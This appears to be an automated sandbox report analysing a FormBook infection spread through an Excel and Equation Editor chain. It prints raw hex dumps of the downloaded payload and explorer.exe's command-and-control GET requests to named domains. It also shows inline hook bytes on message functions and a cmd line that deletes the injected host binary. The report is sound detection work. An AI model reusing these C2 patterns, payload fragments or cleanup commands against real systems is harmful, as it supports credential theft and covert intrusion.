                                                                                                                                                    Nov 26, 2020 09:03:42.558520079 CET3INData Raw: 00 00 43 01 00 00 27 01 00 00 bb 00 00 00 0b 01 00 00 38 75 01 00 00 06 28 16 00 00 06 28 17 00 00 06 07 20 34 bd 45 4d 5a 20 07 92 dd 9c 61 2b 99 72 4d 00 00 70 28 06 00 00 06 28 1e 00 00 0a 31 08 20 a2 7c b0 4a 25 2b 06 20 b5 f9 bc 1f 25 26 07
                                                                                                                                                    Data Ascii: C'8u(( 4EMZ a+rMp((1 |J%+ %& o.Za8l(, +a%+ 0b%&8Qs( Z xpza8-(%(~( ,rMp(( P8(, %+ 'Q%& fZa8(
                                                                                                                                                    Nov 26, 2020 09:03:42.558537006 CET5INData Raw: 00 00 02 00 01 00 3f 40 00 02 00 00 00 00 13 30 04 00 aa 00 00 00 01 00 00 11 00 02 16 28 37 00 00 0a 20 30 b1 83 46 20 42 07 ad 3e 61 25 0a 1d 5e 45 07 00 00 00 02 00 00 00 68 00 00 00 d0 ff ff ff 2f 00 00 00 55 00 00 00 18 00 00 00 45 00 00 00
                                                                                                                                                    Data Ascii: ?@0(7 0F B>a%^Eh/UE+f(6 Z ia+(8 YzWZ /La+(9 Z [JKa+ c;mZ i#a+ ZZ |a8m(:*0D(<oI(; Ca k}a%^E
                                                                                                                                                    Nov 26, 2020 09:03:42.558552980 CET6INData Raw: 00 00 18 00 00 00 02 00 00 00 df ff ff ff 2b 16 28 01 00 00 2b 0a 11 07 20 12 76 e4 30 5a 20 35 81 29 12 61 2b cc dd d8 00 00 00 75 a1 00 00 01 25 2d 04 26 16 2b 19 25 28 65 00 00 06 13 04 11 04 28 66 00 00 06 14 fe 03 13 05 11 05 16 fe 03 fe 11
                                                                                                                                                    Data Ascii: +(+ v0Z 5)a+u%-&+%(e(f&rp%(f(g(a(f(hz a%^E'+%~(_(i Z ia+ g/ a%^E+
                                                                                                                                                    Nov 26, 2020 09:03:42.781543016 CET8INData Raw: 1e 16 34 9b 25 2b 06 20 70 13 00 88 25 26 2b a6 02 02 7c 0e 00 00 04 28 0f 00 00 2b 20 06 d4 51 d2 2b 93 06 20 eb c3 74 34 5a 20 30 b3 dc 1a 61 2b 84 2a 00 00 00 13 30 04 00 8d 00 00 00 01 00 00 11 03 02 7b 0f 00 00 04 fe 01 2c 6a 20 eb 41 0f 70
                                                                                                                                                    Data Ascii: 4%+ p%&+|(+ Q+ t4Z 0a+*0{,j Ap S5a%^E$U>+S IZ `Ra+|(+ 5"O+rp(nz pZ .oa+- xz%+ lL%&+*0{,= +@
                                                                                                                                                    Nov 26, 2020 09:03:42.781585932 CET9INData Raw: 1c 5e 45 06 00 00 00 d4 ff ff ff 2b 00 00 00 55 00 00 00 02 00 00 00 42 00 00 00 11 00 00 00 2b 53 06 20 59 d8 42 78 5a 20 f7 ae ba 2a 61 2b c8 72 bf 00 00 70 28 6e 00 00 06 7a 06 20 24 64 1e fd 5a 20 9c 27 11 20 61 2b ae 03 14 fe 03 2c 08 20 85
                                                                                                                                                    Data Ascii: ^E+UB+S YBxZ *a+rp(nz $dZ ' a+, '%%+ @d{%&+|(+ M9+*0{,j ZQ 1}a%^EU>/+Srp(nz !Z <\}a+|(+ Opg4+ Z
                                                                                                                                                    Nov 26, 2020 09:03:42.781598091 CET10INData Raw: 04 00 7d 00 00 00 10 00 00 11 00 20 cf 24 96 60 20 0e 90 f3 32 61 25 0c 1b 5e 45 05 00 00 00 39 00 00 00 02 00 00 00 d8 ff ff ff 52 00 00 00 2c 00 00 00 2b 50 7e 5e 00 00 0a 8c 08 00 00 1b 14 fe 01 0b 07 2c 08 20 cc 45 66 df 25 2b 06 20 1a 14 5d
                                                                                                                                                    Data Ascii: } $` 2a%^E9R,+P~^, Ef%+ ]%& CYZa+~^ +(+^ VZ O`a+*0~( |m dda%^En,B+l- EP%+ N%& $0Za+~
                                                                                                                                                    Nov 26, 2020 09:03:42.781610012 CET12INData Raw: 20 9c 4e 80 0e 5a 20 d0 33 c9 14 61 2b b0 7e 20 00 00 04 0c 11 05 20 24 fd d2 16 5a 20 86 29 07 12 61 2b 9a 08 28 95 00 00 06 11 05 20 1f 06 34 a3 5a 20 fc c5 a6 ed 61 2b 84 7e 1f 00 00 04 16 fe 01 0b 07 39 9b 01 00 00 11 05 20 3e b9 e4 e5 5a 20
                                                                                                                                                    Data Ascii: NZ 3a+~ $Z )a+( 4Z a+~9 >Z ;LMa8b( x la%^EY+Ez8(:se( [Z 88a+~ }Z a+ 3`gZ {a8w
                                                                                                                                                    Nov 26, 2020 09:03:42.781641960 CET13INData Raw: 5e 45 8c 00 00 00 83 08 00 00 ca 05 00 00 18 06 00 00 7f 0b 00 00 52 05 00 00 05 00 00 00 18 00 00 00 53 03 00 00 a6 10 00 00 4e 0b 00 00 1c 07 00 00 7e 09 00 00 d2 0d 00 00 52 07 00 00 4b 0d 00 00 3f 05 00 00 c1 09 00 00 e2 06 00 00 cf 06 00 00
                                                                                                                                                    Data Ascii: ^ERSN~RK?^p_\D?"dkukoA&+-
                                                                                                                                                    Nov 26, 2020 09:03:42.781653881 CET14INData Raw: 00 70 28 fe 00 00 06 06 20 ee c3 04 2e 5a 20 4d 1f df 1f 61 38 a0 fa ff ff 00 02 6f c9 00 00 06 72 2d 02 00 70 28 fe 00 00 06 06 20 96 32 a4 e0 5a 20 10 39 15 b0 61 38 7d fa ff ff 00 06 20 1a 1b 96 4e 5a 20 08 c9 5c 6c 61 38 6a fa ff ff 02 6f b1
                                                                                                                                                    Data Ascii: p( .Z Ma8or-p( 2Z 9a8} NZ \la8jorp( 6PiZ TTa8H ?Z Xa85(o 9xZ ta8or=p( JZ ?@a8orMp( 6YZ `a8 Z _yQ
                                                                                                                                                    Nov 26, 2020 09:03:42.781672001 CET16INData Raw: 1f 3e 61 38 77 f5 ff ff 02 28 e6 00 00 06 6f c6 00 00 06 00 06 20 28 7e 97 b5 5a 20 8b 4e d8 dd 61 38 59 f5 ff ff 02 6f 9d 00 00 06 16 28 ed 00 00 06 00 06 20 37 78 0f 62 5a 20 af f8 e0 b2 61 38 3a f5 ff ff 02 6f c1 00 00 06 1f 37 28 ff 00 00 06
                                                                                                                                                    Data Ascii: >a8w(o (~Z Na8Yo( 7xbZ a8:o7( ZpfZ Da8 sq( Z a8(o(o >Z #%ia8orp( [P_Z w>a8or!p(o7


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.2.2249166216.130.188.9380C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 26, 2020 09:04:47.360749960 CET949OUTGET /kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg== HTTP/1.1
                                                                                                                                                    Host: www.affinitymotorsales.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 26, 2020 09:04:47.465672016 CET950INHTTP/1.1 302 Found
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Content-length: 0
                                                                                                                                                    Location: https://www.affinitymotorsales.com/kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg==
                                                                                                                                                    Connection: close


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    2192.168.2.224916734.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 26, 2020 09:05:07.705564022 CET950OUTGET /kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll HTTP/1.1
                                                                                                                                                    Host: www.setyourhead.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 26, 2020 09:05:07.821191072 CET951INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Thu, 26 Nov 2020 08:05:07 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 275
                                                                                                                                                    ETag: "5fb7c9ca-113"
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                    Code Manipulations

                                                                                                                                                    User Modules

                                                                                                                                                    Hook Summary

                                                                                                                                                    Function NameHook TypeActive in Processes
                                                                                                                                                    PeekMessageAINLINEexplorer.exe
                                                                                                                                                    PeekMessageWINLINEexplorer.exe
                                                                                                                                                    GetMessageWINLINEexplorer.exe
                                                                                                                                                    GetMessageAINLINEexplorer.exe

                                                                                                                                                    Processes

                                                                                                                                                    Process: explorer.exe, Module: USER32.dll
                                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE1
                                                                                                                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE1
                                                                                                                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE1
                                                                                                                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE1

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    Analysis Process: EXCEL.EXE PID: 2448 Parent PID: 584

                                                                                                                                                    General

                                                                                                                                                    Start time:09:02:53
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                    File size:27641504 bytes
                                                                                                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: EQNEDT32.EXE PID: 2536 Parent PID: 584

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:13
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:543304 bytes
                                                                                                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: vbc.exe PID: 2884 Parent PID: 2536

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:18
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Users\Public\vbc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                    Imagebase:0xe80000
                                                                                                                                                    File size:909312 bytes
                                                                                                                                                    MD5 hash:5DEDC928F9F5E3A4C59490E79BCF0773
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2189207331.0000000002371000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 25%, ReversingLabs
                                                                                                                                                    Reputation:low

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: RegSvcs.exe PID: 2344 Parent PID: 2884

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:27
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                    Imagebase:0xf30000
                                                                                                                                                    File size:45216 bytes
                                                                                                                                                    MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: explorer.exe PID: 1388 Parent PID: 2344

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:29
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:
                                                                                                                                                    Imagebase:0xffca0000
                                                                                                                                                    File size:3229696 bytes
                                                                                                                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: raserver.exe PID: 3024 Parent PID: 1388

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:38
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                    Imagebase:0x9a0000
                                                                                                                                                    File size:101888 bytes
                                                                                                                                                    MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: cmd.exe PID: 3004 Parent PID: 3024

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:42
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                                                                                                                    Imagebase:0x49d30000
                                                                                                                                                    File size:302592 bytes
                                                                                                                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >

                                                                                                                                                      Analysis Process: vbc.exe PID: 2884 Parent PID: 2536 vbc.exeCOMMON

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 003A2488, Relevance: 4.1, Strings: 3, Instructions: 327COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Tb6$Tb6$Tb6
                                                                                                                                                      • API String ID: 0-2153171216
                                                                                                                                                      • Opcode ID: dfd209d13b9cd5886b9245990396c796e8f3fa2540a4e1ef56d7145f2c822087
                                                                                                                                                      • Instruction ID: bee0361bc309c443f1cc9537674ee539179e6628fb91b01cb6f0de2c380dc496
                                                                                                                                                      • Opcode Fuzzy Hash: dfd209d13b9cd5886b9245990396c796e8f3fa2540a4e1ef56d7145f2c822087
                                                                                                                                                      • Instruction Fuzzy Hash: 3CE11874E05219CFCB15CFA9D984B9EFBB6FB8A310F10846AD40AA7764DB309985DF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A247A, Relevance: 4.1, Strings: 3, Instructions: 310COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Tb6$Tb6$Tb6
                                                                                                                                                      • API String ID: 0-2153171216
                                                                                                                                                      • Opcode ID: 5846c80f9c1ea63e4b6a1cb3c8f905ef951aa71e7093d4fe301f64b8e874054f
                                                                                                                                                      • Instruction ID: eb061c347d5815c52d6c5162e25faa978ee8a7d51defd2cf2c70c2358ce13472
                                                                                                                                                      • Opcode Fuzzy Hash: 5846c80f9c1ea63e4b6a1cb3c8f905ef951aa71e7093d4fe301f64b8e874054f
                                                                                                                                                      • Instruction Fuzzy Hash: 68D11974E00219CFDB15CFA9D984B9EFBB6EB8A310F10846AD41AB7764DB309985DF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A0DA0, Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                      • String ID: YFIK$YFIK
                                                                                                                                                      • API String ID: 2962429428-1440790054
                                                                                                                                                      • Opcode ID: 173d5bd307f785c316296604334b8362f84a966d2e2440e3d134514bcc820bee
                                                                                                                                                      • Instruction ID: 8e8619401b6adfde5ec4ad6fa14af13da186b47e4c721f2163d83c2846c8c9a5
                                                                                                                                                      • Opcode Fuzzy Hash: 173d5bd307f785c316296604334b8362f84a966d2e2440e3d134514bcc820bee
                                                                                                                                                      • Instruction Fuzzy Hash: F9B15674D14218CFCB19CFA5D984A9EBBB6FF8A300F248929D40ABB754DB345981DF24
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A0D91, Relevance: 2.7, Strings: 2, Instructions: 227COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: YFIK$YFIK
                                                                                                                                                      • API String ID: 0-1440790054
                                                                                                                                                      • Opcode ID: 0d331294766154e3e0793cf035e8fa81151df0d3781df6e04edc5d30dc655972
                                                                                                                                                      • Instruction ID: 1c1491351727a9d80622d9baf465c88a4bead2dcf9be64d41f289dd6ff8db13d
                                                                                                                                                      • Opcode Fuzzy Hash: 0d331294766154e3e0793cf035e8fa81151df0d3781df6e04edc5d30dc655972
                                                                                                                                                      • Instruction Fuzzy Hash: C4A17870D14258CFCB19DFA4D984A9DBBB6FF8A300F24892AD40ABB754DB345981DF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A10DB, Relevance: 2.7, Strings: 2, Instructions: 199COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: YFIK$YFIK
                                                                                                                                                      • API String ID: 0-1440790054
                                                                                                                                                      • Opcode ID: b32dcf90d1a61c16369a33ac1ae7639e5f7c61cc308818d73cbb1c11908f4679
                                                                                                                                                      • Instruction ID: e59bf293a17b9450f434c39f5ed589dbcd5abe3959a785fdda3fe8e126f53a9b
                                                                                                                                                      • Opcode Fuzzy Hash: b32dcf90d1a61c16369a33ac1ae7639e5f7c61cc308818d73cbb1c11908f4679
                                                                                                                                                      • Instruction Fuzzy Hash: 32915870D1425CCFCB19DFA4E984A9DBBB5FF4A300F24892AD40ABB664DB345981DF20
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A014F, Relevance: 1.6, APIs: 1, Instructions: 110nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 003A0C15
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1778838933-0
                                                                                                                                                      • Opcode ID: 94d0020f8c0f3a6cf823abde4be20eae808bf8d7545c7505d3c1a2bc7dee4737
                                                                                                                                                      • Instruction ID: 64f0b79362346eaec9d387adc6d08c65848b72dec2273f743f3f7f3c9ae193e2
                                                                                                                                                      • Opcode Fuzzy Hash: 94d0020f8c0f3a6cf823abde4be20eae808bf8d7545c7505d3c1a2bc7dee4737
                                                                                                                                                      • Instruction Fuzzy Hash: 154189B8D042589FCB14CFA9D884ADEFBB4FB19310F10916AE814B7210D334A902CF65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A015C, Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 003A0C15
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1778838933-0
                                                                                                                                                      • Opcode ID: 968fc0d9e3b15308a592e3826147968a23ba6259499b8e7de26f172242cf1074
                                                                                                                                                      • Instruction ID: 90021f7b49a121a8d3de8a129aceabeb66b71a83f621d1008d007586aed75426
                                                                                                                                                      • Opcode Fuzzy Hash: 968fc0d9e3b15308a592e3826147968a23ba6259499b8e7de26f172242cf1074
                                                                                                                                                      • Instruction Fuzzy Hash: AF4165B8D04258DFCF14CFA9D984A9EFBB5EB1A310F20942AE818B7210D375A945CF65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A0B59, Relevance: 1.6, APIs: 1, Instructions: 101nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 003A0C15
                                                                                                                                                      Memory Dump Source
